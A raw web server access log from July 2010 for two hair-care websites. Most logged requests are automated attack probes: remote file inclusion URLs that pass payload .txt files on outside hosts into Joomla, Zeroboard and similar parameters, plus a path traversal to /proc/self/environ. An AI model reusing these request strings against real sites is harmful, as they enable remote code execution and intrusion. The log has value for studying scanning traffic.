84.255.193.115 - - [12/Jul/2010:20:49:31 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:31 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:31 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:31 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:49 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:51 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:50:59 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:51:00 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:20:51:27 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:51:53 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:51:54 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:52:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:52:21 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:52:21 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:52:21 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:20:56:39 -0700] "GET /include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:20:56:39 -0700] "GET /logs//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:20:56:45 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:21:03:18 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:03:18 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:03:18 -0700] "GET /logs/access_100315.log%20%20/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:03:19 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:03:19 -0700] "GET /logs/access_100315.log%20%20/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:03:20 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:21:07:15 -0700] "GET /include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:21:07:15 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:21:07:15 -0700] "GET /logs//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.166.97.170 - - [12/Jul/2010:21:09:48 -0700] "GET /include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.154.248.22 - - [12/Jul/2010:21:09:54 -0700] "GET /include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:09:59 -0700] "GET /logs/access_100621.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:10:00 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:10:00 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:10:03 -0700] "GET /logs/access_100621.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:10:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:10:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:21:10:28 -0700] "GET /logs/access_100301.log//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:21:10:28 -0700] "GET /logs//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:21:11:20 -0700] "GET /logs/access.log//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.166.97.170 - - [12/Jul/2010:21:11:53 -0700] "GET /logs//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:11:53 -0700] "GET /logs/access_100531.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:21:11:55 -0700] "GET /logs/access_100531.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
93.166.97.170 - - [12/Jul/2010:21:12:32 -0700] "GET /logs/access_100301.log//include/write.php?dir=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:22 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:22 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:22 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:23 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:23 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:14:23 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:14:29 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:14:29 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:14:36 -0700] "GET /logs/access_100104.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:15:40 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:15:40 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:15:40 -0700] "GET /logs/access_100104.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
88.191.228.166 - - [12/Jul/2010:21:15:47 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:15:47 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:16:19 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:16:19 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:16:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /logs/access_100614.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /logs/access_100614.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:17:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:42 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:42 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:42 -0700] "GET /logs/access.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:50 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:50 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:17:50 -0700] "GET /logs/access.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:17:53 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:17:54 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:19:10 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:19:10 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:20:04 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:20:04 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:21:20:04 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
208.80.193.42 - - [12/Jul/2010:21:20:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; yie6_SBC; YPC 3.2.0; FunWebProducts; (R1 1.5; yplus 5.1.02b); .NET CLR 1.1.4322)" "www.freehairsecrets.com"
216.17.105.143 - - [12/Jul/2010:21:24:54 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.freehairsecrets.com"
216.17.105.143 - - [12/Jul/2010:21:24:54 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.freehairsecrets.com"
143.107.142.226 - - [12/Jul/2010:21:27:39 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
143.107.142.226 - - [12/Jul/2010:21:27:39 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
143.107.142.226 - - [12/Jul/2010:21:27:39 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.50 - - [12/Jul/2010:21:29:08 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.114.50 - - [12/Jul/2010:21:29:08 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
114.38.86.144 - - [12/Jul/2010:21:29:28 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
114.38.86.144 - - [12/Jul/2010:21:29:28 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.17.105.143 - - [12/Jul/2010:21:32:00 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:21:34:46 -0700] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:34:47 -0700] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:34:50 -0700] "GET /logs/access_100412.log/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:34:50 -0700] "GET /logs/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:34:51 -0700] "GET /logs/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:34:51 -0700] "GET /logs/access_100412.log/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.123.60 - - [12/Jul/2010:21:38:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:39:03 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:39:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:39:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:39:09 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:39:09 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:21:39:09 -0700] "GET /logs/access.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:40:12 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:40:12 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
88.191.228.166 - - [12/Jul/2010:21:40:12 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:21:41:14 -0700] "GET /_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:41:14 -0700] "GET /logs/access_100315.log%20%20//_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:41:14 -0700] "GET /logs//_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:41:55 -0700] "GET /logs/access_100315.log%20%20//_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:41:56 -0700] "GET /_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:21:41:56 -0700] "GET /logs//_head.php?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:21:42:26 -0700] "GET /logs/access_100412.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
